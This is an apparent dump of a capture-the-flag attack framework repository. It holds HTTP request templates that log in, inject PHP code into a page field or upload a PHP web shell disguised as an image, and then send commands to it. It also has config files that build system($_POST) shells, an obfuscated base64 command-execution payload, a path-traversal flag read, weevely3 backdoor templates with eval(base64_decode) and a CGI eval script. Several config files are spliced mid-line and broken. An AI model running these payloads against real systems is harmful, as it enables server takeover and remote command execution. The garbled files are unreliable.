-------------------------------------------------------------------------------- 1 | POST /login.php HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 36 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/login.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | cont1=123456789&bogus=&submit=Log+in 16 | -------------------------------------------------------------------------------- /seq/change_passeword/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin.php?action=editpage HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 150 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/admin.php?action=editpage 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | Cookie: {{cookie}} 15 | 16 | title=aaaa&seo_name=baidu.com&content=6666&description=&keywords=&hidden=';{{shell}};//&sub_page={{hash}}&theme=default&save=Save 17 | -------------------------------------------------------------------------------- /seq/change_passeword/3.txt: -------------------------------------------------------------------------------- 1 | POST /data/settings/pages/{{hash}}1.baidu.com.php HTTP/1.1 2 | Host: 118.190.78.155:23333 3 | Accept-Encoding: identity 4 | Content-Length: 35 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 7 | 8 | {{hash}}={{cmd}} 9 | -------------------------------------------------------------------------------- /seq/change_passeword/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/change_passeword/__init__.py -------------------------------------------------------------------------------- /seq/change_passeword/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_2 = "system($_POST['%s']);"%re_hash_2 17 | re_hash_3 = re_hash_2 18 | 19 | 20 | #re_hash_3 = random_string() 21 | #re_filename_4 = re_filename_3 22 | #re_hash_4 = re_hash_3 23 | -------------------------------------------------------------------------------- /seq/edit_page/1.txt: -------------------------------------------------------------------------------- 1 | POST /login.php HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 36 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/login.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | cont1=12345678&bogus=&submit=Log+in 16 | -------------------------------------------------------------------------------- /seq/edit_page/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin.php?action=editpage HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 150 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/admin.php?action=editpage 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | Cookie: {{cookie}} 15 | 16 | title=aaaa&seo_name=baidu.com&content=6666&description=&keywords=&hidden=';{{shell}};//&sub_page={{hash}}&theme=default&save=Save 17 | -------------------------------------------------------------------------------- /seq/edit_page/3.txt: -------------------------------------------------------------------------------- 1 | POST /data/settings/pages/{{hash}}1.baidu.com.php HTTP/1.1 2 | Host: 118.190.78.155:23333 3 | Accept-Encoding: identity 4 | Content-Length: 35 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 7 | 8 | {{hash}}={{cmd}} 9 | -------------------------------------------------------------------------------- /seq/edit_page/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/edit_page/__init__.py -------------------------------------------------------------------------------- /seq/edit_page/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_2 = "system($_POST['%s']);"%re_hash_2 17 | re_hash_3 = re_hash_2 18 | 19 | 20 | #re_hash_3 = random_string() 21 | #re_filename_4 = re_filename_3 22 | #re_hash_4 = re_hash_3 23 | -------------------------------------------------------------------------------- /seq/example/1.txt: -------------------------------------------------------------------------------- 1 | POST /index.php HTTP/1.1 2 | Host: mut-orff.org:12345 3 | Accept-Encoding: identity 4 | Content-Length: 153 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 7 | 8 | 222=%24a%3D%27sy%27.%27stem%27%3B%24b%20%3D%20%27{{cmd}}%27%3B%24a%28base64_decode%28%24b%29%29%3B 9 | -------------------------------------------------------------------------------- /seq/example/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/example/__init__.py -------------------------------------------------------------------------------- /seq/example/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | 7 | def random_string(): 8 | return hashlib.md5(str(time.time())).hexdigest() 9 | 10 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 11 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 12 | #re_filename_3 = random_string() + '.pht' 13 | #re_hash_3 = random_string() 14 | #re_filename_4 = re_filename_3 15 | #re_hash_4 = re_hash_3 16 | -------------------------------------------------------------------------------- /seq/gen_py.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import re 4 | 5 | my_dir = 'read_flag_qwb' 6 | count = 3 7 | 8 | file_dir = '' + my_dir + '/' 9 | 10 | res = '''#!/usr/bin/env python 11 | 12 | from new_replay import * 13 | import requests 14 | import hashlib 15 | import time 16 | 17 | #target = '47.105.121.116' 18 | #target_port = 80 19 | my_hash = hashlib.md5('xxxx' + str(target) + str(target_port) + str(time.time())).hexdigest() 20 | file_dir = '%s' 21 | s = requests.session() 22 | 23 | '''%file_dir 24 | 25 | 26 | for i in range(count): 27 | content = open(file_dir + '%d.txt' %(i+1)).read() 28 | rep_strs = re.findall('{{[\w]+}}',content) 29 | res += '''request_%d = open(file_dir + '%d.txt').read()\n'''%(i+1,i+1) 30 | for rep_str in rep_strs: 31 | res += '''request_%d = request_%d.replace('%s','')\n'''%(i+1,i+1,rep_str) 32 | 33 | res += '''reply_%d = send_http(s,parse_http(request_%d),target,target_port) 34 | print reply_%d[1]''' %(i+1,i+1,i+1) 35 | res += "\n\n" 36 | 37 | 38 | open('../attack.py','w').write(res) 39 | 40 | -------------------------------------------------------------------------------- /seq/image_upload/1.txt: -------------------------------------------------------------------------------- 1 | POST /login.php HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 36 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: application/x-www-form-urlencoded 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/login.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | cont1=12345678&bogus=&submit=Log+in 16 | -------------------------------------------------------------------------------- /seq/image_upload/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin.php?action=images HTTP/1.1 2 | Host: 192.168.37.133:8888 3 | Proxy-Connection: keep-alive 4 | Content-Length: 294 5 | Cache-Control: max-age=0 6 | Origin: http://192.168.37.133:8888 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykn0cxRBYFpjA92DI 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://192.168.37.133:8888/admin.php?action=images 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | Cookie: {{cookie}} 15 | 16 | ------WebKitFormBoundarykn0cxRBYFpjA92DI 17 | Content-Disposition: form-data; name="imagefile"; filename="{{hash}}.php" 18 | Content-Type: image/jpeg 19 | 20 | 21 | {{shell}} 22 | ------WebKitFormBoundarykn0cxRBYFpjA92DI 23 | Content-Disposition: form-data; name="submit" 24 | 25 | Upload 26 | ------WebKitFormBoundarykn0cxRBYFpjA92DI-- 27 | -------------------------------------------------------------------------------- /seq/image_upload/3.txt: -------------------------------------------------------------------------------- 1 | POST /images/{{hash}}.php HTTP/1.1 2 | Host: 118.190.78.155:23333 3 | Accept-Encoding: identity 4 | Content-Length: 35 5 | Content-Type: application/x-www-form-urlencoded 6 | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 7 | 8 | {{hash}}={{cmd}} 9 | -------------------------------------------------------------------------------- /seq/image_upload/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/image_upload/__init__.py -------------------------------------------------------------------------------- /seq/image_upload/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_2 = "',''],"re_pass_2":['','']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_1_raw = "',''],"re_pass_2":['','']} 11 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 12 | #re_filename_3 = random_string() + '.pht' 13 | #re_hash_3 = random_string() 14 | #re_filename_4 = re_filename_3 15 | #re_hash_4 = re_hash_3 16 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/1.txt: -------------------------------------------------------------------------------- 1 | GET /web/login HTTP/1.1 2 | Host: 172.16.5.28:5053 3 | Connection: keep-alive 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | User-Agent: python-requests/2.18.1 7 | 8 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/2.txt: -------------------------------------------------------------------------------- 1 | POST /web/login_check HTTP/1.1 2 | Host: 172.16.5.28:5053 3 | Connection: keep-alive 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | User-Agent: python-requests/2.18.1 7 | Cookie: {{cookie}} 8 | Content-Type: application/x-www-form-urlencoded 9 | Content-Length: 121 10 | Content-Type: application/x-www-form-urlencoded 11 | A: B 12 | C: D 13 | 14 | _password=teacher&_username=teacher&_csrf_token={{token}}&_target_path=&_remember_me=on 15 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/3.txt: -------------------------------------------------------------------------------- 1 | GET /web/classroom/1/manage/student/export?role=student&fileName=/var/www/html/web/app/data/private_files/../../../../../../../../../../../../a/../flag HTTP/1.1 2 | Host: 172.16.5.28:5053 3 | Connection: keep-alive 4 | Accept-Encoding: gzip, deflate 5 | Accept: */* 6 | User-Agent: python-requests/2.18.1 7 | Cookie: REMEMBERME=Qml6XFVzZXJcQ3VycmVudFVzZXI6ZEdWaFkyaGxja0IwWldGamFHVnlMblJsWVdOb1pYST06MTU1NTIxNzYzMDo5MjhhYmE3NzA4MzkyOWI1NzZjYjZhNWM2NTA2MjQwMTZhM2RkOWMzNmM3ZWZjNDFhZDFiZTJjMGRhZjRhMTNm; PHPSESSID={{cookie}} 8 | -------------------------------------------------------------------------------- /seq/read_flag_qwb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/read_flag_qwb/__init__.py -------------------------------------------------------------------------------- /seq/read_flag_qwb/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | res_re_pattern_1 = {"re_cookie_2":['PHPSESSID=','; path=/']} 13 | re_cookie_3 = re_cookie_2 14 | res_re_pattern_1 = { 15 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 16 | #re_filename_3 = random_string() + '.pht' 17 | re_hash_2 = random_string() 18 | re_shell_2 = "system($_POST['%s']);"%re_hash_2 19 | re_hash_3 = re_hash_2 20 | 21 | 22 | #re_hash_3 = random_string() 23 | #re_filename_4 = re_filename_3 24 | #re_hash_4 = re_hash_3 25 | -------------------------------------------------------------------------------- /seq/shit_upload/1.txt: -------------------------------------------------------------------------------- 1 | POST /user/upFiles/upload HTTP/1.1 2 | Host: 172.20.121.101 3 | Content-Length: 183 4 | Accept: application/json, text/javascript, */*; q=0.01 5 | Origin: http://172.20.121.101 6 | X-Requested-With: XMLHttpRequest 7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 8 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykTVbczAdhtOXMPcc 9 | Referer: http://172.20.121.101/index.php/user/Set/index 10 | Accept-Encoding: gzip, deflate 11 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,pl;q=0.6 12 | Cookie: PHPSESSID=6tbvpak6a0suhfru3pkc0fsgr4 13 | Connection: close 14 | 15 | ------WebKitFormBoundarykTVbczAdhtOXMPcc 16 | Content-Disposition: form-data; name="file"; filename="1.php" 17 | Content-Type: image/jpeg 18 | 19 | {{shell}} 20 | ------WebKitFormBoundarykTVbczAdhtOXMPcc-- 21 | -------------------------------------------------------------------------------- /seq/shit_upload/2.txt: -------------------------------------------------------------------------------- 1 | POST /public{{filename}} HTTP/1.1 2 | Host: 172.16.0.200 3 | Content-Type: application/x-www-form-urlencoded 4 | Content-Length: 44 5 | 6 | {{hash}}={{cmd}} 7 | -------------------------------------------------------------------------------- /seq/shit_upload/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/shit_upload/__init__.py -------------------------------------------------------------------------------- /seq/shit_upload/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_1_raw = base64.b64encode("'%re_hash_3) 13 | re_filename_2 = random_string() 14 | re_filename_3 = re_filename_2 15 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 16 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 17 | #re_filename_3 = random_string() + '.pht' 18 | #re_hash_3 = random_string() 19 | #re_filename_4 = re_filename_3 20 | #re_hash_4 = re_hash_3 21 | -------------------------------------------------------------------------------- /seq/sql/test.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /seq/template_replay.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from new_replay import * 4 | import requests 5 | 6 | #target = '47.105.121.116' 7 | #target_port = 80 8 | file_dir = 'seq/shit_upload/' 9 | s = requests.session() 10 | 11 | 12 | request_1 = open(file_dir + '1.txt').read() 13 | request_1 = request_1.replace('{{}}','') 14 | request_1 = request_1.replace('{{}}','') 15 | reply_1 = send_http(s,parse_http(request_1),target,target_port) 16 | print reply_1[1] 17 | 18 | 19 | request_2 = open(file_dir + '2.txt').read() 20 | request_2 = request_1.replace('{{}}','') 21 | request_2 = request_1.replace('{{}}','') 22 | reply_2 = send_http(s,parse_http(request_2),target,target_port) 23 | print reply_2[1] 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /seq/test/1.txt: -------------------------------------------------------------------------------- 1 | GET /data/users/admin.xml HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Connection: keep-alive 4 | Pragma: no-cache 5 | Cache-Control: no-cache 6 | Upgrade-Insecure-Requests: 1 7 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 9 | Accept-Encoding: gzip, deflate 10 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 11 | 12 | -------------------------------------------------------------------------------- /seq/test/2.txt: -------------------------------------------------------------------------------- 1 | POST /admin/index.php? HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Connection: keep-alive 4 | Content-Length: 39 5 | Pragma: no-cache 6 | Cache-Control: no-cache 7 | Origin: http://mut-orff.org:8080 8 | Upgrade-Insecure-Requests: 1 9 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 10 | Content-Type: application/x-www-form-urlencoded 11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 12 | Referer: http://mut-orff.org:8080/admin/ 13 | Accept-Encoding: gzip, deflate 14 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 15 | 16 | userid={{user}}&pwd={{pass}}&submitted=Login 17 | -------------------------------------------------------------------------------- /seq/test/3.txt: -------------------------------------------------------------------------------- 1 | POST /admin/my_upload.php HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Proxy-Connection: keep-alive 4 | Content-Length: 329 5 | Cache-Control: max-age=0 6 | Origin: http://mut-orff.org:8080 7 | Upgrade-Insecure-Requests: 1 8 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycIvUVAnoWLssjgc9 10 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 11 | Referer: http://mut-orff.org:8080/admin/my_upload.php 12 | Accept-Encoding: gzip, deflate 13 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 14 | 15 | ------WebKitFormBoundarycIvUVAnoWLssjgc9 16 | Content-Disposition: form-data; name="upload"; filename="{{filename}}" 17 | Content-Type: application/octet-stream 18 | 19 | 20 | ------WebKitFormBoundarycIvUVAnoWLssjgc9 21 | Content-Disposition: form-data; name="MAX_FILE_SIZE" 22 | 23 | 1024 24 | ------WebKitFormBoundarycIvUVAnoWLssjgc9-- 25 | -------------------------------------------------------------------------------- /seq/test/4.txt: -------------------------------------------------------------------------------- 1 | GET /admin/upload/{{filename}}?{{hash}}={{cmd}} HTTP/1.1 2 | Host: mut-orff.org:8080 3 | Proxy-Connection: keep-alive 4 | Cache-Control: max-age=0 5 | Upgrade-Insecure-Requests: 1 6 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 7 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 8 | Accept-Encoding: gzip, deflate 9 | Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 10 | 11 | -------------------------------------------------------------------------------- /seq/test/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/test/__init__.py -------------------------------------------------------------------------------- /seq/test/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | 7 | def random_string(): 8 | return hashlib.md5(str(time.time())).hexdigest() 9 | 10 | res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 11 | res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 12 | re_filename_3 = random_string() + '.pht' 13 | re_hash_3 = random_string() 14 | re_filename_4 = re_filename_3 15 | re_hash_4 = re_hash_3 16 | -------------------------------------------------------------------------------- /seq/test/test.txt: -------------------------------------------------------------------------------- 1 | dsdsdsfs 2 | -------------------------------------------------------------------------------- /seq/upload/1.txt: -------------------------------------------------------------------------------- 1 | POST /index.php?m=Home&c=Uploadify&a=preview&num=1&input=head_pic&path=head_pic&func=add_img HTTP/1.1 2 | Host: 172.16.0.200 3 | Content-Type: application/x-www-form-urlencoded 4 | Content-Length: 47 5 | 6 | data:image/php;base64,{{shell}} 7 | -------------------------------------------------------------------------------- /seq/upload/2.txt: -------------------------------------------------------------------------------- 1 | POST /preview/{{filename}}.php HTTP/1.1 2 | Host: 172.16.0.200 3 | Content-Type: application/x-www-form-urlencoded 4 | Content-Length: 44 5 | 6 | {{hash}}={{cmd}} 7 | -------------------------------------------------------------------------------- /seq/upload/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/upload/__init__.py -------------------------------------------------------------------------------- /seq/upload/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Config for string replacement 4 | import time 5 | import hashlib 6 | import base64 7 | import urllib 8 | 9 | def random_string(): 10 | return hashlib.md5(str(time.time())).hexdigest() 11 | 12 | #res_re_pattern_1 = {"re_user_2":['',''],"re_pass_2":['','']} 13 | #res_re_pattern_2 = {"re_hostname_3":['« Back to Website']} 14 | #re_filename_3 = random_string() + '.pht' 15 | re_hash_2 = random_string() 16 | re_shell_1_raw = base64.b64encode("3){ 4 | $k="${password[2:]}"; 5 | echo "<$k>"; 6 | eval(base64_decode(preg_replace(array("/[^\w=\s]/","/\s/"), array("","+"), join(array_slice($a,$c($a)-3))))); 7 | echo ""; 8 | } 9 | -------------------------------------------------------------------------------- /utils/weevely3/bd/obfuscators/cleartext1_php.tpl: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /utils/weevely3/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/legacycookie/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/legacycookie/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/legacyreferrer/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/legacyreferrer/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/channels/stegaref/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/core/channels/stegaref/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/core/weexceptions.py: -------------------------------------------------------------------------------- 1 | """ Fatal errors """ 2 | class FatalException(Exception): 3 | pass 4 | 5 | """ Fatal errors on module development """ 6 | class DevException(Exception): 7 | pass 8 | 9 | """ Argument parsing tried to Exit """ 10 | class ArgparseError(Exception): 11 | pass 12 | 13 | """ Error on channel internals """ 14 | class ChannelException(Exception): 15 | # This should be intercepted not at send() 16 | # but at some level before (e.g. when) calling 17 | # setup to interrupt directly the cmd execution 18 | pass 19 | -------------------------------------------------------------------------------- /utils/weevely3/modules/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/audit/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/audit/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/audit/_disablefunctionbypass/cgi.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo -ne "Content-Type: text/html\n\n" 3 | b=$(echo "$QUERY_STRING" | sed -n 's/^.*c=\([^&]*\).*$/\1/p' | sed "s/%20/ /g") 4 | eval $b -------------------------------------------------------------------------------- /utils/weevely3/modules/audit/suidsgid.py: -------------------------------------------------------------------------------- 1 | from core.vectors import ShellCmd 2 | from core.module import Module 3 | 4 | class Suidsgid(Module): 5 | 6 | """Find files with SUID or SGID flags.""" 7 | 8 | def init(self): 9 | 10 | self.register_info( 11 | { 12 | 'author': [ 13 | 'Emilio Pinna' 14 | ], 15 | 'license': 'GPLv3' 16 | } 17 | ) 18 | 19 | self.register_arguments([ 20 | { 'name' : 'rpath', 'help' : 'Remote starting path', 'default' : '/' }, 21 | { 'name' : '-only-suid', 'help' : 'Find only suid', 'action' : 'store_true', 'default' : False }, 22 | { 'name' : '-only-sgid', 'help' : 'Find only sgid', 'action' : 'store_true', 'default' : False }, 23 | ]) 24 | 25 | def run(self): 26 | 27 | result = ShellCmd( 28 | payload = """find ${rpath} -type f ${ '-perm -04000' if not only_sgid else '' } ${ '-o' if not only_suid and not only_sgid else '' } ${ '-perm -02000' if not only_suid else '' }""", 29 | arguments = [ 30 | "-stderr_redirection", 31 | " 2>/dev/null", 32 | ]).run(self.args) 33 | 34 | if result: 35 | return result.split('\n') 36 | -------------------------------------------------------------------------------- /utils/weevely3/modules/backdoor/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/utils/weevely3/modules/backdoor/__init__.py -------------------------------------------------------------------------------- /utils/weevely3/modules/backdoor/_reversetcp/__init__.py: -------------------------------------------------------------------------------- 